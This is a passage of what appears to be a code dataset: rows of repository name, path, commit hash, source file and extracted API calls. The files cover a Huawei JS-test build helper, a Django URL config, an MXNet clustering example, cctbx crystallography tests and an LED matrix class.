'torch.cuda.device_count', ({}, {}), '()', False, 'import torch\n'), ((345, 35, 345, 60), 'torch.cuda.device_count', 'torch.cuda.device_count', ({}, {}), '()', False, 'import torch\n'), ((355, 34, 356, 61), 'torch.load', 'torch.load', (), '', False, 'import torch\n'), ((68, 22, 68, 40), 'torch.sigmoid', 'torch.sigmoid', ({(68, 36, 68, 39): 'tmp'}, {}), '(tmp)', False, 'import torch\n')] |
chaoyangcui/test_developertest | src/core/build/pretreat_targets.py | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | #!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shutil
from core.constants import JsTestConst
from xdevice import platform_logger
LOG = platform_logger("PretreatTargets")
##############################################################################
##############################################################################
class PretreatTargets(object):
def __init__(self, target_list):
self.path_list = []
self.name_list = []
self.target_list = target_list
def pretreat_targets_from_list(self):
path_list, name_list = self._parse_target_info()
self._pretreat_by_target_name(path_list, name_list)
def disassemble_targets_from_list(self):
self._disassemble_by_target_name(self.path_list, self.name_list)
def _parse_target_info(self):
path_list = []
name_list = []
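        # Each target is a GN-style label "//path/to/dir:target_name(toolchain)":
        # keep the path without the leading "//" and the name without the
        # "(toolchain)" suffix.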
for line in self.target_list:
path = line.split(':')[0][2:]
name = line.split(':')[1].split('(')[0]
path_list.append(path)
name_list.append(name)
return path_list, name_list
def _pretreat_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
if name.endswith("JsTest"):
if self._pretreat_js_target(path, name):
self.path_list.append(path)
self.name_list.append(name)
LOG.info("js test %s pretreat success" % name)
def _pretreat_js_target(self, path, name):
template_path = os.path.join(sys.framework_root_dir, "libs",
"js_template", "src")
target_path = os.path.join(sys.source_code_root_path, path)
config_path = os.path.join(target_path, "config.json")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
test_path = os.path.join(target_path, "src", "main", "js",
"default", "test")
if not os.path.exists(config_path):
LOG.error("js test needs config.json file")
return False
if not os.path.exists(gn_path):
LOG.error("js test needs BUILD.gn file")
return False
LOG.info("target_path: %s" % target_path)
#modify BUILD.gn file to compile hap
output_path = self._parse_output_path_in_gn(gn_path)
if output_path == "":
LOG.error(" BUILD.gn needs 'module_output_path'")
            return False
os.rename(gn_path, gn_bak_path)
template_args = {'output_path': output_path, 'suite_name': name}
with open(gn_path, 'w') as filehandle:
filehandle.write(JsTestConst.BUILD_GN_FILE_TEMPLATE %
template_args)
#copy js hap template to target path
shutil.copytree(template_path, os.path.join(target_path, "src"))
shutil.copy(config_path, os.path.join(target_path, "src", "main"))
file_name = os.listdir(target_path)
for file in file_name:
if file.endswith(".js"):
LOG.info("file: %s" % file)
shutil.copy(os.path.join(target_path, file), test_path)
with open(os.path.join(test_path, "List.test.js"), 'a') \
as list_data:
list_data.write("require('./%s')" % file)
#modify i18n json file
i18n_path = os.path.join(target_path, "src", "main", "js",
"default", "i18n", "en-US.json")
json_data = ""
with open(i18n_path, 'r') as i18n_file:
lines = i18n_file.readlines()
for line in lines:
if "TargetName" in line:
line = line.replace("TargetName", name)
json_data += line
with open(i18n_path, 'w') as i18n_file:
i18n_file.write(json_data)
return True
def _parse_output_path_in_gn(self, gn_path):
output_path = ""
with open(gn_path, 'r') as gn_file:
for line in gn_file.readlines():
if line.startswith("module_output_path"):
output_path = line.split()[2].strip('"')
break
return output_path
def _disassemble_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
LOG.info("name: %s path: %s" % (name, path))
if name.endswith("JsTest"):
self._disassemble_js_target(path, name)
LOG.info("js test %s disassemble success" % name)
def _disassemble_js_target(self, path, name):
target_path = os.path.join(sys.source_code_root_path, path)
src_path = os.path.join(target_path, "src")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
if os.path.exists(src_path):
shutil.rmtree(src_path)
if os.path.exists(gn_path) and os.path.exists(gn_bak_path):
os.remove(gn_path)
os.rename(gn_bak_path, gn_path)
##############################################################################
##############################################################################
| [((27, 6, 27, 40), 'xdevice.platform_logger', 'platform_logger', ({(27, 22, 27, 39): '"""PretreatTargets"""'}, {}), "('PretreatTargets')", False, 'from xdevice import platform_logger\n'), ((67, 24, 68, 58), 'os.path.join', 'os.path.join', ({(67, 37, 67, 59): 'sys.framework_root_dir', (67, 61, 67, 67): '"""libs"""', (68, 37, 68, 50): '"""js_template"""', (68, 52, 68, 57): '"""src"""'}, {}), "(sys.framework_root_dir, 'libs', 'js_template', 'src')", False, 'import os\n'), ((69, 22, 69, 67), 'os.path.join', 'os.path.join', ({(69, 35, 69, 60): 'sys.source_code_root_path', (69, 62, 69, 66): 'path'}, {}), '(sys.source_code_root_path, path)', False, 'import os\n'), ((70, 22, 70, 62), 'os.path.join', 'os.path.join', ({(70, 35, 70, 46): 'target_path', (70, 48, 70, 61): '"""config.json"""'}, {}), "(target_path, 'config.json')", False, 'import os\n'), ((71, 18, 71, 55), 'os.path.join', 'os.path.join', ({(71, 31, 71, 42): 'target_path', (71, 44, 71, 54): '"""BUILD.gn"""'}, {}), "(target_path, 'BUILD.gn')", False, 'import os\n'), ((72, 22, 72, 59), 'os.path.join', 'os.path.join', ({(72, 35, 72, 46): 'target_path', (72, 48, 72, 58): '"""BuildBak"""'}, {}), "(target_path, 'BuildBak')", False, 'import os\n'), ((73, 20, 74, 51), 'os.path.join', 'os.path.join', ({(73, 33, 73, 44): 'target_path', (73, 46, 73, 51): '"""src"""', (73, 53, 73, 59): '"""main"""', (73, 61, 73, 65): '"""js"""', (74, 33, 74, 42): '"""default"""', (74, 44, 74, 50): '"""test"""'}, {}), "(target_path, 'src', 'main', 'js', 'default', 'test')", False, 'import os\n'), ((88, 8, 88, 39), 'os.rename', 'os.rename', ({(88, 18, 88, 25): 'gn_path', (88, 27, 88, 38): 'gn_bak_path'}, {}), '(gn_path, gn_bak_path)', False, 'import os\n'), ((97, 20, 97, 43), 'os.listdir', 'os.listdir', ({(97, 31, 97, 42): 'target_path'}, {}), '(target_path)', False, 'import os\n'), ((107, 20, 108, 65), 'os.path.join', 'os.path.join', ({(107, 33, 107, 44): 'target_path', (107, 46, 107, 51): '"""src"""', (107, 53, 107, 59): '"""main"""', (107, 61, 107, 65): '"""js"""', (108, 33, 108, 42): '"""default"""', (108, 44, 108, 50): '"""i18n"""', (108, 52, 108, 64): '"""en-US.json"""'}, {}), "(target_path, 'src', 'main', 'js', 'default', 'i18n', 'en-US.json')", False, 'import os\n'), ((137, 22, 137, 67), 'os.path.join', 'os.path.join', ({(137, 35, 137, 60): 'sys.source_code_root_path', (137, 62, 137, 66): 'path'}, {}), '(sys.source_code_root_path, path)', False, 'import os\n'), ((138, 19, 138, 51), 'os.path.join', 'os.path.join', ({(138, 32, 138, 43): 'target_path', (138, 45, 138, 50): '"""src"""'}, {}), "(target_path, 'src')", False, 'import os\n'), ((139, 18, 139, 55), 'os.path.join', 'os.path.join', ({(139, 31, 139, 42): 'target_path', (139, 44, 139, 54): '"""BUILD.gn"""'}, {}), "(target_path, 'BUILD.gn')", False, 'import os\n'), ((140, 22, 140, 59), 'os.path.join', 'os.path.join', ({(140, 35, 140, 46): 'target_path', (140, 48, 140, 58): '"""BuildBak"""'}, {}), "(target_path, 'BuildBak')", False, 'import os\n'), ((142, 11, 142, 35), 'os.path.exists', 'os.path.exists', ({(142, 26, 142, 34): 'src_path'}, {}), '(src_path)', False, 'import os\n'), ((75, 15, 75, 42), 'os.path.exists', 'os.path.exists', ({(75, 30, 75, 41): 'config_path'}, {}), '(config_path)', False, 'import os\n'), ((78, 15, 78, 38), 'os.path.exists', 'os.path.exists', ({(78, 30, 78, 37): 'gn_path'}, {}), '(gn_path)', False, 'import os\n'), ((95, 39, 95, 71), 'os.path.join', 'os.path.join', ({(95, 52, 95, 63): 'target_path', (95, 65, 95, 70): '"""src"""'}, {}), "(target_path, 'src')", False, 'import os\n'), 
((96, 33, 96, 73), 'os.path.join', 'os.path.join', ({(96, 46, 96, 57): 'target_path', (96, 59, 96, 64): '"""src"""', (96, 66, 96, 72): '"""main"""'}, {}), "(target_path, 'src', 'main')", False, 'import os\n'), ((143, 12, 143, 35), 'shutil.rmtree', 'shutil.rmtree', ({(143, 26, 143, 34): 'src_path'}, {}), '(src_path)', False, 'import shutil\n'), ((144, 11, 144, 34), 'os.path.exists', 'os.path.exists', ({(144, 26, 144, 33): 'gn_path'}, {}), '(gn_path)', False, 'import os\n'), ((144, 39, 144, 66), 'os.path.exists', 'os.path.exists', ({(144, 54, 144, 65): 'gn_bak_path'}, {}), '(gn_bak_path)', False, 'import os\n'), ((145, 12, 145, 30), 'os.remove', 'os.remove', ({(145, 22, 145, 29): 'gn_path'}, {}), '(gn_path)', False, 'import os\n'), ((146, 12, 146, 43), 'os.rename', 'os.rename', ({(146, 22, 146, 33): 'gn_bak_path', (146, 35, 146, 42): 'gn_path'}, {}), '(gn_bak_path, gn_path)', False, 'import os\n'), ((101, 28, 101, 59), 'os.path.join', 'os.path.join', ({(101, 41, 101, 52): 'target_path', (101, 54, 101, 58): 'file'}, {}), '(target_path, file)', False, 'import os\n'), ((102, 26, 102, 65), 'os.path.join', 'os.path.join', ({(102, 39, 102, 48): 'test_path', (102, 50, 102, 64): '"""List.test.js"""'}, {}), "(test_path, 'List.test.js')", False, 'import os\n')] |
lukaszbanasiak/django-contrib-comments | tests/testapp/urls.py | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | from __future__ import absolute_import
from django.conf.urls import patterns, url
from django_comments.feeds import LatestCommentFeed
from custom_comments import views
feeds = {
'comments': LatestCommentFeed,
}
urlpatterns = patterns('',
url(r'^post/$', views.custom_submit_comment),
url(r'^flag/(\d+)/$', views.custom_flag_comment),
url(r'^delete/(\d+)/$', views.custom_delete_comment),
url(r'^approve/(\d+)/$', views.custom_approve_comment),
url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'),
)
urlpatterns += patterns('',
(r'^rss/comments/$', LatestCommentFeed()),
)
| [((15, 4, 15, 48), 'django.conf.urls.url', 'url', ({(15, 8, 15, 18): '"""^post/$"""', (15, 20, 15, 47): 'views.custom_submit_comment'}, {}), "('^post/$', views.custom_submit_comment)", False, 'from django.conf.urls import patterns, url\n'), ((16, 4, 16, 52), 'django.conf.urls.url', 'url', ({(16, 8, 16, 24): '"""^flag/(\\\\d+)/$"""', (16, 26, 16, 51): 'views.custom_flag_comment'}, {}), "('^flag/(\\\\d+)/$', views.custom_flag_comment)", False, 'from django.conf.urls import patterns, url\n'), ((17, 4, 17, 56), 'django.conf.urls.url', 'url', ({(17, 8, 17, 26): '"""^delete/(\\\\d+)/$"""', (17, 28, 17, 55): 'views.custom_delete_comment'}, {}), "('^delete/(\\\\d+)/$', views.custom_delete_comment)", False, 'from django.conf.urls import patterns, url\n'), ((18, 4, 18, 58), 'django.conf.urls.url', 'url', ({(18, 8, 18, 27): '"""^approve/(\\\\d+)/$"""', (18, 29, 18, 57): 'views.custom_approve_comment'}, {}), "('^approve/(\\\\d+)/$', views.custom_approve_comment)", False, 'from django.conf.urls import patterns, url\n'), ((19, 4, 19, 104), 'django.conf.urls.url', 'url', (), '', False, 'from django.conf.urls import patterns, url\n'), ((23, 25, 23, 44), 'django_comments.feeds.LatestCommentFeed', 'LatestCommentFeed', ({}, {}), '()', False, 'from django_comments.feeds import LatestCommentFeed\n')] |
rajasekar-venkatesan/Deep_Learning | pyTorch/utils.py | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | import pandas as pd, numpy as np
from sklearn.preprocessing import OneHotEncoder
author_int_dict = {'EAP':0,'HPL':1,'MWS':2}
def load_train_test_data(num_samples=None):
train_data = pd.read_csv('../data/train.csv')
train_data['author'] = [author_int_dict[a] for a in train_data['author'].tolist()]
test_data = pd.read_csv('../data/test.csv')
return train_data[:num_samples],test_data[:num_samples]
def categorical_labeler(labels):
labels = labels.reshape(-1, 1)
#labels = OneHotEncoder().fit_transform(labels).todense()
labels = np.array(labels, dtype=np.int64)
return labels
if __name__ == '__main__':
pass | [((7, 17, 7, 49), 'pandas.read_csv', 'pd.read_csv', ({(7, 29, 7, 48): '"""../data/train.csv"""'}, {}), "('../data/train.csv')", True, 'import pandas as pd, numpy as np\n'), ((9, 16, 9, 47), 'pandas.read_csv', 'pd.read_csv', ({(9, 28, 9, 46): '"""../data/test.csv"""'}, {}), "('../data/test.csv')", True, 'import pandas as pd, numpy as np\n'), ((15, 13, 15, 45), 'numpy.array', 'np.array', (), '', True, 'import pandas as pd, numpy as np\n')] |
TheBurningCrusade/A_mxnet | example/dec/dec.py | fa2a8e3c438bea16b993e9537f75e2082d83346f | # pylint: skip-file
import sys
import os
# code to automatically download dataset
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path
import mxnet as mx
import numpy as np
import data
from scipy.spatial.distance import cdist
from sklearn.cluster import KMeans
import model
from autoencoder import AutoEncoderModel
from solver import Solver, Monitor
import logging
def cluster_acc(Y_pred, Y):
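    # Unsupervised clustering accuracy: build the contingency matrix w between
    # predicted clusters and true labels, then choose the one-to-one
    # cluster-to-label mapping that maximizes total agreement (Hungarian algorithm).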
    from scipy.optimize import linear_sum_assignment  # sklearn's private linear_assignment_ was removed
assert Y_pred.size == Y.size
D = max(Y_pred.max(), Y.max())+1
w = np.zeros((D,D), dtype=np.int64)
for i in range(Y_pred.size):
w[Y_pred[i], Y[i]] += 1
    row_ind, col_ind = linear_sum_assignment(w.max() - w)
    return sum(w[i, j] for i, j in zip(row_ind, col_ind))*1.0/Y_pred.size, w
class DECModel(model.MXModel):
class DECLoss(mx.operator.NumpyOp):
def __init__(self, num_centers, alpha):
super(DECModel.DECLoss, self).__init__(need_top_grad=False)
self.num_centers = num_centers
self.alpha = alpha
def forward(self, in_data, out_data):
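            # Soft assignment (DEC): q[i, j] is a Student's t-kernel between
            # embedding z[i] and cluster center mu[j],
            # q[i, j] ~ (1 + ||z[i] - mu[j]||^2 / alpha) ** (-(alpha + 1) / 2),
            # normalized so that each row of q sums to 1.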
z = in_data[0]
mu = in_data[1]
q = out_data[0]
self.mask = 1.0/(1.0+cdist(z, mu)**2/self.alpha)
q[:] = self.mask**((self.alpha+1.0)/2.0)
q[:] = (q.T/q.sum(axis=1)).T
def backward(self, out_grad, in_data, out_data, in_grad):
q = out_data[0]
z = in_data[0]
mu = in_data[1]
p = in_data[2]
dz = in_grad[0]
dmu = in_grad[1]
self.mask *= (self.alpha+1.0)/self.alpha*(p-q)
dz[:] = (z.T*self.mask.sum(axis=1)).T - self.mask.dot(mu)
dmu[:] = (mu.T*self.mask.sum(axis=0)).T - self.mask.T.dot(z)
def infer_shape(self, in_shape):
assert len(in_shape) == 3
assert len(in_shape[0]) == 2
input_shape = in_shape[0]
label_shape = (input_shape[0], self.num_centers)
mu_shape = (self.num_centers, input_shape[1])
out_shape = (input_shape[0], self.num_centers)
return [input_shape, mu_shape, label_shape], [out_shape]
def list_arguments(self):
return ['data', 'mu', 'label']
def setup(self, X, num_centers, alpha, save_to='dec_model'):
        sep = X.shape[0]*9//10  # floor division keeps the index an int under Python 3
X_train = X[:sep]
X_val = X[sep:]
ae_model = AutoEncoderModel(self.xpu, [X.shape[1],500,500,2000,10], pt_dropout=0.2)
if not os.path.exists(save_to+'_pt.arg'):
ae_model.layerwise_pretrain(X_train, 256, 50000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.finetune(X_train, 256, 100000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.save(save_to+'_pt.arg')
logging.log(logging.INFO, "Autoencoder Training error: %f"%ae_model.eval(X_train))
logging.log(logging.INFO, "Autoencoder Validation error: %f"%ae_model.eval(X_val))
else:
ae_model.load(save_to+'_pt.arg')
self.ae_model = ae_model
self.dec_op = DECModel.DECLoss(num_centers, alpha)
label = mx.sym.Variable('label')
self.feature = self.ae_model.encoder
self.loss = self.dec_op(data=self.ae_model.encoder, label=label, name='dec')
self.args.update({k:v for k,v in self.ae_model.args.items() if k in self.ae_model.encoder.list_arguments()})
self.args['dec_mu'] = mx.nd.empty((num_centers, self.ae_model.dims[-1]), ctx=self.xpu)
self.args_grad.update({k: mx.nd.empty(v.shape, ctx=self.xpu) for k,v in self.args.items()})
self.args_mult.update({k: k.endswith('bias') and 2.0 or 1.0 for k in self.args})
self.num_centers = num_centers
def cluster(self, X, y=None, update_interval=None):
N = X.shape[0]
if not update_interval:
update_interval = N
batch_size = 256
test_iter = mx.io.NDArrayIter({'data': X}, batch_size=batch_size, shuffle=False,
last_batch_handle='pad')
args = {k: mx.nd.array(v.asnumpy(), ctx=self.xpu) for k, v in self.args.items()}
        z = list(model.extract_feature(self.feature, args, test_iter, N, self.xpu).values())[0]
kmeans = KMeans(self.num_centers, n_init=20)
kmeans.fit(z)
args['dec_mu'][:] = kmeans.cluster_centers_
solver = Solver('sgd', momentum=0.9, wd=0.0, learning_rate=0.01)
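        # Custom metric: mean per-sample KL divergence KL(P || Q) between the
        # target distribution ("label") and the current soft assignments ("pred").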
def ce(label, pred):
return np.sum(label*np.log(label/(pred+0.000001)))/label.shape[0]
solver.set_metric(mx.metric.CustomMetric(ce))
label_buff = np.zeros((X.shape[0], self.num_centers))
train_iter = mx.io.NDArrayIter({'data': X}, {'label': label_buff}, batch_size=batch_size,
shuffle=False, last_batch_handle='roll_over')
self.y_pred = np.zeros((X.shape[0]))
def refresh(i):
if i%update_interval == 0:
                z = list(model.extract_feature(self.feature, args, test_iter, N, self.xpu).values())[0]
p = np.zeros((z.shape[0], self.num_centers))
self.dec_op.forward([z, args['dec_mu'].asnumpy()], [p])
y_pred = p.argmax(axis=1)
                print(np.std(np.bincount(y_pred)), np.bincount(y_pred))
                print(np.std(np.bincount(y.astype(int))), np.bincount(y.astype(int)))
if y is not None:
print(cluster_acc(y_pred, y)[0])
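            # Self-training target distribution P (DEC Eq. 3): square the soft
            # assignments, reweight by inverse cluster frequency and renormalize
            # per row, which sharpens confident assignments.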
weight = 1.0/p.sum(axis=0)
weight *= self.num_centers/weight.sum()
p = (p**2)*weight
train_iter.data_list[1][:] = (p.T/p.sum(axis=1)).T
            print(np.sum(y_pred != self.y_pred), 0.001*y_pred.shape[0])
if np.sum(y_pred != self.y_pred) < 0.001*y_pred.shape[0]:
self.y_pred = y_pred
return True
self.y_pred = y_pred
solver.set_iter_start_callback(refresh)
solver.set_monitor(Monitor(50))
solver.solve(self.xpu, self.loss, args, self.args_grad,
train_iter, 0, 1000000000, {}, False)
self.end_args = args
if y is not None:
return cluster_acc(self.y_pred, y)[0]
else:
return -1
def mnist_exp(xpu):
X, Y = data.get_mnist()
dec_model = DECModel(xpu, X, 10, 1.0, 'data/mnist')
acc = []
for i in [10*(2**j) for j in range(9)]:
acc.append(dec_model.cluster(X, Y, i))
logging.log(logging.INFO, 'Clustering Acc: %f at update interval: %d'%(acc[-1], i))
logging.info(str(acc))
logging.info('Best Clustering ACC: %f at update_interval: %d'%(np.max(acc), 10*(2**np.argmax(acc))))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
mnist_exp(mx.gpu(0))
| [] |
rimmartin/cctbx_project | cctbx/maptbx/tst_target_and_gradients.py | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | from __future__ import division
from cctbx.array_family import flex
from cctbx import xray
from cctbx import crystal
from cctbx import maptbx
from cctbx.maptbx import minimization
from libtbx.test_utils import approx_equal
import random
from cctbx.development import random_structure
from cctbx import sgtbx
if (1):
random.seed(0)
flex.set_random_seed(0)
def get_xrs():
crystal_symmetry = crystal.symmetry(
unit_cell=(10,10,10,90,90,90),
space_group_symbol="P 1")
return xray.structure(
crystal_symmetry=crystal_symmetry,
scatterers=flex.xray_scatterer([
xray.scatterer(label="C", site=(0,0,0))]))
def get_map(xrs, d_min=1.):
f_calc = xrs.structure_factors(d_min=d_min).f_calc()
fft_map = f_calc.fft_map()
fft_map.apply_sigma_scaling()
return fft_map.real_map_unpadded(), f_calc
def exercise_00():
"""
  Exercise maptbx.target_and_gradients_diffmap.
"""
xrs = get_xrs()
map_data, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_data,
step = 0.3,
sites_frac = xrs.sites_frac())
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
assert approx_equal(tg.target(), 0)
assert approx_equal(list(tg.gradients()), [[0,0,0]])
xrs = xrs.translate(x=0.3, y=-0.5, z=0.7)
assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]])
map_current, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_current,
step = 0.3,
sites_frac = xrs.sites_frac())
assert tg.target() > 0
for g in tg.gradients():
for g_ in g:
assert abs(g_)>0.
def exercise_01(d_min=1.0):
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization.
"""
xrs = get_xrs()
map_target, f_calc = get_map(xrs=xrs)
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
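  # Displace the atom by every sign combination of the (0.3, 0.5, 0.7) shifts
  # (including zero) and check that minimization against the target map
  # restores the original site.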
for sx in [-1,0,1]:
for sy in [-1,0,1]:
for sz in [-1,0,1]:
xrs_cp = xrs.deep_copy_scatterers()
xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz)
assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6)
crystal_gridding = maptbx.crystal_gridding(
unit_cell = xrs_cp.unit_cell(),
space_group_info = xrs_cp.space_group_info(),
pre_determined_n_real = map_target.accessor().all())
o = minimization.run(
xray_structure = xrs_cp,
miller_array = f_calc,
crystal_gridding = crystal_gridding,
map_target = map_target,
step = d_min/4,
target_type = "diffmap")
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
def exercise_02():
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error>0.7
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
for step in [miller_array.d_min()/4]*5:
minimized = minimization.run(
xray_structure = xrs_sh,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = step,
geometry_restraints_manager = None,
target_type = "diffmap")
xrs_sh = minimized.xray_structure
map_current = minimized.map_current
final_error = flex.mean(xrs.distances(other = minimized.xray_structure))
assert approx_equal(start_error, 0.8, 1.e-3)
assert final_error < 1.e-4
def exercise_03():
"""
Exercise maptbx.target_and_gradients_simple.
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
#
t1 = maptbx.real_space_target_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
selection = flex.bool(xrs_sh.scatterers().size(), True))
g1 = maptbx.real_space_gradients_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
o = maptbx.target_and_gradients_simple(
unit_cell = xrs.unit_cell(),
map_target = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
assert approx_equal(t1, o.target())
for gi,gj in zip(g1, o.gradients()):
assert approx_equal(gi, gj)
def exercise_04():
"""
Exercise maptbx.target_and_gradients_simple in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1., resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 150)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.3)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error > 0.29
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
xrs_sh_ = xrs_sh.deep_copy_scatterers()
minimized = minimization.run(
xray_structure = xrs_sh_,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = 0.5,
geometry_restraints_manager = None,
target_type = "simple")
xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart)
final_error = flex.mean(xrs.distances(other = xrs_sh_))
assert final_error < 0.015
if (__name__ == "__main__"):
exercise_00()
exercise_01()
exercise_02()
exercise_03()
exercise_04()
| [((13, 2, 13, 16), 'random.seed', 'random.seed', ({(13, 14, 13, 15): '(0)'}, {}), '(0)', False, 'import random\n'), ((14, 2, 14, 25), 'cctbx.array_family.flex.set_random_seed', 'flex.set_random_seed', ({(14, 23, 14, 24): '(0)'}, {}), '(0)', False, 'from cctbx.array_family import flex\n'), ((17, 21, 19, 29), 'cctbx.crystal.symmetry', 'crystal.symmetry', (), '', False, 'from cctbx import crystal\n'), ((123, 9, 123, 46), 'libtbx.test_utils.approx_equal', 'approx_equal', ({(123, 22, 123, 33): 'start_error', (123, 35, 123, 38): '(0.8)', (123, 40, 123, 45): '(0.001)'}, {}), '(start_error, 0.8, 0.001)', False, 'from libtbx.test_utils import approx_equal\n'), ((188, 14, 197, 43), 'cctbx.maptbx.minimization.run', 'minimization.run', (), '', False, 'from cctbx.maptbx import minimization\n'), ((110, 16, 119, 46), 'cctbx.maptbx.minimization.run', 'minimization.run', (), '', False, 'from cctbx.maptbx import minimization\n'), ((163, 11, 163, 31), 'libtbx.test_utils.approx_equal', 'approx_equal', ({(163, 24, 163, 26): 'gi', (163, 28, 163, 30): 'gj'}, {}), '(gi, gj)', False, 'from libtbx.test_utils import approx_equal\n'), ((99, 24, 99, 57), 'cctbx.sgtbx.space_group_info', 'sgtbx.space_group_info', ({(99, 47, 99, 56): '"""P212121"""'}, {}), "('P212121')", False, 'from cctbx import sgtbx\n'), ((137, 24, 137, 57), 'cctbx.sgtbx.space_group_info', 'sgtbx.space_group_info', ({(137, 47, 137, 56): '"""P212121"""'}, {}), "('P212121')", False, 'from cctbx import sgtbx\n'), ((177, 24, 177, 57), 'cctbx.sgtbx.space_group_info', 'sgtbx.space_group_info', ({(177, 47, 177, 56): '"""P212121"""'}, {}), "('P212121')", False, 'from cctbx import sgtbx\n'), ((77, 12, 83, 39), 'cctbx.maptbx.minimization.run', 'minimization.run', (), '', False, 'from cctbx.maptbx import minimization\n'), ((23, 6, 23, 45), 'cctbx.xray.scatterer', 'xray.scatterer', (), '', False, 'from cctbx import xray\n')] |
viktor-ferenczi/open-imagilib | open_imagilib/matrix.py | 3e7328840d58fd49eda28490e9bddf91390b1981 | """ LED matrix
"""
__all__ = ['Matrix']
from .colors import Color, on, off
from .fonts import font_6x8
class Matrix(list):
def __init__(self, source=None) -> None:
if source is None:
row_iter = ([off for _ in range(8)] for _ in range(8))
elif isinstance(source, list):
row_iter = (list(row) for row in source)
else:
raise TypeError('Unknown source to build a Matrix from')
super().__init__(row_iter)
def background(self, color: Color) -> None:
for i in range(8):
for j in range(8):
self[i][j] = color
def character(self, char: str, char_color: Color = on, *, x_offset: int = 1) -> None:
if x_offset <= -8 or x_offset >= 8:
return
if len(char) > 1:
char = char[0]
if not char:
char = ' '
if char < ' ' or char > '\x7f':
char = '\x7f'
bitmap = font_6x8[ord(char) - 32]
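        # font_6x8 is indexed from ASCII 32 (space); each entry is a 6x8
        # row/column pattern in which non-space cells mark lit pixels.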
for i, row in enumerate(bitmap):
for j, c in enumerate(row):
if c != ' ':
x = x_offset + j
if 0 <= x < 8:
self[i][x] = char_color
| [] |
alexandru-dinu/PRML | prml/linear/_classifier.py | acd823e098df67abe0306a70225e7539f8edda40 | class Classifier(object):
"""Base class for classifiers."""
| [] |
